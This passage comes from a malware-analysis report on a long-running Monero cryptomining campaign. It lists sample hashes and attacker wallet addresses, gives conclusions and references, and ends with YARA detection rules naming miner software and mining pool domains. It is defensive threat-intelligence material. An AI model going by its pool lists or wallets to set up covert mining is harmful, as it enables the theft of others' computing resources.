f4d1441b956ff153bde028e78c1ecd4d085c Bash script for 3/56 2018-05-18 11.0 KB 59bae001c979845bfe3077699e35 Linux 222e84e81e50a3711f285f13b2df0e4b516f Bash script for 4/60 2018-05-19 10.8 KB 4f1b8ef88e9e9c579116b039df78 Linux Interestingly, during our analysis we found binaries that were design to explicitly kill any process in the compromised server that was using the same wallet discussed above. One of such samples was: - 1c16ccf341840120598b910b2b2b858e35d4e92610c357f24f1c6da24f59341f - First seen in VirusTotal: 2018-04-26 - Type of file: Bash script for Linux - Kills all the processes using the current wallet​ we investigate plus other 3 ​ wallets presumably related with competition miners. Therefore this script probably does not belong to the same attackers. |a2e687d7e627b32100c8cd7d5cdfa334169e a6d29e94dda899915f780b80000f|24/59|2018-03-04|2.1 KB|Powershell script for Windows|Col6| |---|---|---|---|---|---| |a88ee13e645bcbbf62a08e66f41975cbedd7 03661bbde774eb2aed2b3ac71412|16/60|2018-03-04|8.0 KB|Bash script for Linux|| |b28e44a3cc5a9a78cf96cda67295a35b0d98 569fcd81f0c95063a3b0197c5c81|15/59|2018-03-04|8.1 KB|Bash script for Linux|| |b4657c04eb6c1da95edd40e8d3e15f5d0262 5a6e92afc37ae278f95de7b1ab91|22/59|2018-03-04|8.4 KB|Bash script for Linux|| |c9e89fc49706aae347ce5ec5067ca9cd57c9 c6b92841567543de51e0a17e152e|15/60|2018-03-04|8.0 KB|Bash script for Linux|| |e2403b8198fc3dfdac409ea3ce313bbf12b4 64b60652d7e2e1bc7d6c356f7e5e|24/59|2018-03-04|8.0 KB|Bash script for Linux|| |ecaa914472297d1d00a390ec50596aefd748 6a67777892237f5290395818b584|15/60|2018-03-04|8.1 KB|Bash script for Linux|| |5d0850bde9a9725ea0c433e9a599db0f929b 2dcb1a7a25b09276e7d95dfb5ba5|23/59|2018-03-16|2.3 KB|Powershell script for Windows|| |c24d69e63120e4fb180f7fc1e38017264e44 8817075855cdb82d746d346d26cd|24/56|2018-03-16|6.9 KB|Bash script for Linux|| |4186517778ea8c77b5d1073186660dc4cdfd 3048365e925e0408e6259f70595b|24/59|2018-03-20|2.3 KB|Powershell script for Windows|| |c6d303c3a93cc56262be93f9b0c96a241f0e 5d31c7020763aa80f887acb339e4|14/57|2018-03-20|2.3 KB|Powershell script for Windows|| |5332a6cf0ed9e202a5c18f24fe4bf7795006 ec115c1556f8d3af65f6779ebfe9|18/59|2018-04-23|2.3 KB|Powershell script for Windows|| |968dd3fb76d1b73b162ec3de5ada77182107 5104630cbc627de3ba2c70ccbdce|0/59|2018-04-26|10.4 KB|Bash script for Linux|| |db21d6e3fc4a068351bafa0d521610342f05 0eb4047fe2709338f990a108f1e1|1/60|2018-04-26|10.5 KB|Bash script for Linux|| |ec2ab9a279d73f8ee26cf47bced5a00dd540 e75469d098a0f5f0a44d69a4a935|0/59|2018-05-15|1.5 KB|Bash script for Linux|Attacks against docker| |f4d1441b956ff153bde028e78c1ecd4d085c 59bae001c979845bfe3077699e35|3/56|2018-05-18|11.0 KB|Bash script for Linux|| |222e84e81e50a3711f285f13b2df0e4b516f 4f1b8ef88e9e9c579116b039df78|4/60|2018-05-19|10.8 KB|Bash script for Linux|| ----- - 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV 8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC - 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4Zy BZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB - 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDm ShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM ----- # Conclusions In this report we analyzed and studied a Monero cryptomining intrusion against a web server in one of our partner organizations. The analysis led to the discovery that this was not the first time the organization was attacked by this type of threat. The attack was not targeted to the organization, but it was part of a bigger and global campaign. We uncovered cryptomining attacks from the same threat actor that spanned more than a year. The threat actor has the resources to actively exploit different applications and operating systems, adapting to new vulnerabilities. The wallet used in this attack was blocked many months before the current intrusion. The use of Monero for cryptomining reduces our ability to find more information of the attackers as Monero provides strong privacy for its users. The current attack seems to be part of a trend in small but powerful malware that seeks quick profit. The actors behind these attack seem to have a small infrastructure of servers but at the same time they have a large coverage of different malware and infections. By using simple bash scripts they may look like simple attackers, but they are important enough to generate 29 different malware using the same cryptocurrency wallet. ----- # References [1] "Jenkins Miner: One of the Biggest Mining Operations Ever Discovered." Check Point Research. February 15, 2018. Accessed May 15, 2018. Website: [https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovere](https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/) [d/](https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/) [2] “Vulnerabilities in Apache CouchDB Open the Door to Monero Miners - TrendLabs Security Intelligence Blog." Trend Micro, Inc. February 15, 2018. Accessed May 15, 2018. Website: [https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-op](https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/) [en-door-monero-miners/](https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/) [3] Pingios, Anastasios. "The Kworker Linux Crypto miner Malware." December 13, 2017. Accessed May 15, 2018. Website: [https://xorl.wordpress.com/2017/12/13/the-kworker-linux-cryptominer-malware/](https://xorl.wordpress.com/2017/12/13/the-kworker-linux-cryptominer-malware/) [4] “Oracle WebLogic Vulnerability Being Exploited by Bitcoin Miners.” REN-ISAC Advisory. January 5, 2018. Accessed May 15, 2018. Website: [https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vul](https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf) [nerability_Bitcoin_Miner_Attacks_20180105v1.pdf](https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf) [5] "CVE-2017-1000353." Common Vulnerabilities and Exposures (CVE®)​ . January 29, 2018. ​ Accessed May 15, 2018. Website: [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000353. ​](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000353) [6] “XMRig hackers”. January 3rd, 2018. Website: [https://www.reddit.com/r/MoneroMining/comments/7nv8h6/xmrig_hackers/](https://www.reddit.com/r/MoneroMining/comments/7nv8h6/xmrig_hackers/) [7] “Yet Another Crypto Mining Botnet?“. Website: [https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html](https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html) [8] VirusTotal Analysis Report. Website: [https://www.virustotal.com/en/file/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700](https://www.virustotal.com/en/file/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017/analysis/) [d22983772886017/analysis/](https://www.virustotal.com/en/file/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017/analysis/) [9] “Malicious service in DC/OS. Known vulnerabilities?”. June 2, 2017. Accessed May 31, 2018. Website: [https://groups.google.com/a/dcos.io/forum/#!topic/users/NF4wMQ2VrJ8 ​](https://groups.google.com/a/dcos.io/forum/#!topic/users/NF4wMQ2VrJ8) [10] “CentOS Server Records Due to Mining Project Minerd Intrusion Event Due to Redis”. July 18, 2017. Accessed May 31, 2018. Website: [https://blog.csdn.net/Dancen/article/details/75313424](https://blog.csdn.net/Dancen/article/details/75313424) [11] “Joe Sandbox Cloud Analysis Report”. Website: [https://www.joesandbox.com/analysis/37564/0/html](https://www.joesandbox.com/analysis/37564/0/html) [12] “ReverseIT Analysis Report”. Website: [https://www.reverse.it/sample/68aa5e5a1bf7fc7e6101c78cb484555b750d253f99dd8f8f08cb8e](https://www.reverse.it/sample/68aa5e5a1bf7fc7e6101c78cb484555b750d253f99dd8f8f08cb8e81ceaf6a31?environmentId=300) [81ceaf6a31?environmentId=300](https://www.reverse.it/sample/68aa5e5a1bf7fc7e6101c78cb484555b750d253f99dd8f8f08cb8e81ceaf6a31?environmentId=300) [13] REDIS. August 4, 2017. Accessed May 31, 2018. Website: [https://www.kancloud.cn/daydaygo/daydaygo_wiki/371890](https://www.kancloud.cn/daydaygo/daydaygo_wiki/371890) [14] “Untitled PasteBin”. April 29, 2018. Accessed May 31, 2018. Website: [https://pastebin.com/8bvST97K](https://pastebin.com/8bvST97K) ----- [15] “Kubernetes and minerd”. October 11, 2017. Accessed May 31, 2018. Website: [http://www.cnblogs.com/birdstudio/p/7650622.html](http://www.cnblogs.com/birdstudio/p/7650622.html) [16] “Security at MIT”. May 14, 2018. Accessed May 31, 2018. Website: [https://css.csail.mit.edu/6.858/2018/lec/l23-mit-ist.pptx](https://css.csail.mit.edu/6.858/2018/lec/l23-mit-ist.pptx) [17] Abuse report on IP. April 6, 2018. Accessed May 31, 2018. Website: [https://www.abuseipdb.com/check/192.99.142.232](https://www.abuseipdb.com/check/192.99.142.232) [18] “Drupalgeddon 2: Profiting from Mass Exploitation”. April 16, 2018. Accessed May 31, 2018. Website: [https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/](https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/) [19] “suppoie malware removal (script hidden in .jpg).” April 19, 2018. Accessed May 31, 2018. Website: [https://askubuntu.com/questions/1026545/suppoie-malware-removal-script-hidden-in-jpg](https://askubuntu.com/questions/1026545/suppoie-malware-removal-script-hidden-in-jpg) [20] “CMD and Powershell keeping opening on background (nsm.exe on TEMP folder)”. January 23, 2018. Accessed May 31, 2018. Website: [https://forums.malwarebytes.com/topic/219497-cmd-and-powershell-keeping-opening-on-bac](https://forums.malwarebytes.com/topic/219497-cmd-and-powershell-keeping-opening-on-background-nsmexe-on-temp-folder/) [kground-nsmexe-on-temp-folder/](https://forums.malwarebytes.com/topic/219497-cmd-and-powershell-keeping-opening-on-background-nsmexe-on-temp-folder/) [21] URLScan.IO Analysis Report. December 14, 2017. Accessed May 31, 2018. Website: [https://urlscan.io/result/67f5f30d-88ae-4d2b-acad-956de60e5f04/forms/](https://urlscan.io/result/67f5f30d-88ae-4d2b-acad-956de60e5f04/forms/) [22] “Untitled PasteBin”. November 30, 2017. Accessed May 31, 2018. Website: [https://pastebin.com/hLGasbqu](https://pastebin.com/hLGasbqu) [23] “juanked”. January 3, 2018. Accessed May 31, 2018. Website: [https://pastebin.com/zfEvhZ6c](https://pastebin.com/zfEvhZ6c) [24] “Untitled PasteBin”. January 12, 2018. Accessed May 31, 2018. Website: [https://pastebin.com/bHHcCdpr](https://pastebin.com/bHHcCdpr) [25] “wls_vuln_attempt_67.231.243.10_1.ps1”. January 13, 2018. Accessed May 31, 2018. Website: [https://pastebin.com/ctisSMcY​](https://pastebin.com/ctisSMcY) ----- # Appendix A: Information on malware sample 4fa4269b7ce44bfce5ef574e6a37c38f This technical appendix summarizes the external information we gathered about the malware. ## Malware identification **MD5: 4fa4269b7ce44bfce5ef574e6a37c38f​** **SHA256: 63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017** **SIZE: 2.8 MB** **Virus Total:** **[https://www.virustotal.com/#/file/4fa4269b7ce44bfce5ef574e6a37c38f](https://www.virustotal.com/#/file/4fa4269b7ce44bfce5ef574e6a37c38f)** **-** **First submission: 2016-07-05 02:11:32 UTC** **-** **Last submission: 2018-05-14 23:55:45 UTC** **-** **First seen in the wild: 2015-03-27 04:37:01** ## Malware reports **Indicators of compromise.** - [https://vms.drweb.com/virus/?_is=1&i=8400823](https://vms.drweb.com/virus/?_is=1&i=8400823) - [https://otx.alienvault.com/pulse/57ad94a9e083f4013526d2dc](https://otx.alienvault.com/pulse/57ad94a9e083f4013526d2dc) **Other mentions of the malware.** - [https://www.scumware.org/report/4FA4269B7CE44BFCE5EF574E6A37C38F.html](https://www.scumware.org/report/4FA4269B7CE44BFCE5EF574E6A37C38F.html) - [http://r.virscan.org/report/696c4a1270b0cb2f0e62532b676ab957](http://r.virscan.org/report/696c4a1270b0cb2f0e62532b676ab957) - [https://detux.org/report.php?sha256=63210b24f42c05b2c5f8fd62e98dba6de45c7d751](https://detux.org/report.php?sha256=63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017) [a2e55700d22983772886017](https://detux.org/report.php?sha256=63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017) - [https://www.hybrid-analysis.com/sample/63210b24f42c05b2c5f8fd62e98dba6de45c7d](https://www.hybrid-analysis.com/sample/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017?environmentId=120) [751a2e55700d22983772886017?environmentId=120](https://www.hybrid-analysis.com/sample/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017?environmentId=120) ----- **VirusTotal Graph of relationships.** Source: [https://www.virustotal.com/graph/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d2298377](https://www.virustotal.com/graph/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017?src=minigraph#/selected/n63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017/drawer/node-summary) [2886017?src=minigraph#/selected/n63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983](https://www.virustotal.com/graph/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017?src=minigraph#/selected/n63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017/drawer/node-summary) [772886017/drawer/node-summary](https://www.virustotal.com/graph/63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017?src=minigraph#/selected/n63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017/drawer/node-summary) ----- # Appendix B: YARA rules for miner detections **rule possible_cryptominer_minerd** **{** **meta:** **author = "Joachim Suico, CivilSphere"** **date = "1/23/2018"** **description = "rule for executables based on minerd software (supports** **various coins)"** **reference = "https://github.com/pooler/cpuminer"** **strings:** **$crypto = "crypto" ascii nocase** **$cpuminer = "cpuminer" ascii nocase** **$minerd1 = "minerd --help" ascii nocase** **$minerd2 = "minerd [OPTIONS]" ascii nocase** **//author related information** **$author1 = "Miner by yvg1900" ascii nocase** **$author2 = "yvg1900@gmail.com" ascii nocase** **$author3 = "MINERGATE" ascii** **//some supported coins** **$coin1 = "MemoryCoin" ascii** **$coin2 = "MaxCoin" ascii** **$coin3 = "DiamondCoin" ascii** **$coin4 = "DvoraKoin" ascii** **$coin5 = "MyriadCoin" ascii** **$coin6 = "ByteCoin" ascii** **$coin7 = "QuazarCoin" ascii** **$coin8 = "FantomCoin" ascii** **$coin9 = "GroestlCoin" ascii** **$coin10 = "ProtoSharesCoin" ascii** **$coin11 = "MoneroCoin" ascii** **//sites to forward mined hashes** **$site1 = "pool.minexmr.com" ascii nocase** **$site2 = "monero.crypto-pool.fr" ascii nocase** **$site3 = "pool.cryptoescrow.eu" ascii nocase** **$site4 = "xmr.hashinvest" ascii nocase** **$site5 = "monero.farm" ascii nocase** **$site6 = "cryptonotepool.org.uk" ascii nocase** **$site7 = "monerominers.net" ascii nocase** **$site8 = "extremepool.org" ascii nocase** **$site9 = "mine.moneropool.org" ascii nocase** **$site10 = "mmcpool.com" ascii nocase** ----- **$site11 = "dwarfpool.com" ascii nocase** **$site12 = "maxcoinpool.com" ascii nocase** **$site13 = "coinedpool.com" ascii nocase** **$site14 = "mining4all.eu" ascii nocase** **$site15 = "nut2pools.com" ascii nocase** **$site16 = "rocketpool.co.uk" ascii nocase** **$site17 = "miningpoolhub.com" ascii nocase** **$site18 = "nonce-pool.com" ascii nocase** **$site19 = "p2poolcoin.com" ascii nocase** **$site20 = "cryptity.com" ascii nocase** **$site21 = "extremepool.com" ascii nocase** **$site22 = "crypto-pool.fr" ascii nocase** **$site23 = "cryptoescrow.eu" ascii nocase** **$site24 = "moneropool.com" ascii nocase** **$site25 = "coinmine.pl" ascii nocase** **$site26 = "moneropool.com.br" ascii nocase** **$site27 = "moneropool.org" ascii nocase** **$site28 = "cryptohunger.com" ascii nocase** **condition:** **(is_elf or is_pe) and** **((#crypto > 10 and #cpuminer > 3 and all of ($minerd*)) or** **(#crypto > 3 and 1 of ($author*) and 1 of ($coin*) and 1 of ($site*)))** **}** **rule possible_cryptominer_xmrig** **{** **meta:** **author = "Joachim Suico, CivilSphere"** **date = "1/23/2018"** **description = "rule for executables based on XMRig (monero miner)"** **reference = "https://github.com/xmrig/xmrig"** **strings:** **$c1 = "crypto" ascii nocase** **$x1 = "xmrig" ascii nocase** **$m1 = "xmrig [OPTIONS]" ascii nocase** **$m2 = "minergate.com" ascii nocase** **condition:** **(is_elf or is_pe) and #c1 > 4 and #x1 > 5 and any of ($m*)** **}** ----- **rule is_pe** **{** **condition:** **uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550** **}** **rule is_elf** **{** **strings:** **$elf = { 7f 45 4c 46 }** **condition:** **$elf in (0..4)** **}** -----